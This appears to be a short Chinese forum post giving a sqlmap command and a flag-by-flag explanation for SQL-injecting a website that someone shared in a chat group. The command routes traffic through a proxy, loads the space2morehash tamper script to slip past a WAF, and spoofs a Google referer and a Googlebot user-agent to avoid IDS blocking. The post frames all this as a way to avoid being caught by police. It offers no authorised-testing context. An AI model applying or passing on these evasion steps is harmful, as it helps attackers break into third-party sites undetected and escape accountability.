sqlmap注入技巧-绕过WAF和IDS

刚刚群里有个哥们发了个注入点，有IDS防火墙，请求过于频繁就会封杀IP

有个思路，抛砖引玉，各位大牛请轻拍

sqlmap.py --proxy http://127.0.0.1:8087 -u 你懂得 -v 3 –dbms “MySQL” --tamper “space2morehash.py” --referer“http://www.google.com”  --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html）"

参数解释 ：

--proxy //这个是代理的IP，你不用代理不用VPN就不怕被查水表么。。。

-u  //这个不懂的面壁去

-v 3 //这个是注入的详细级别1-5

--dbms "MySQL"  //指定数据库

--tamper “space2morehash.py”  //载入绕过WAF防火墙的脚本

--referer“http://www.google.com” //模拟来源，就是从哪个网页跳转过来的。如果不懂可以谷歌referer

--user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html）"   模拟谷歌蜘蛛，一般都不会限制蜘蛛爬网站。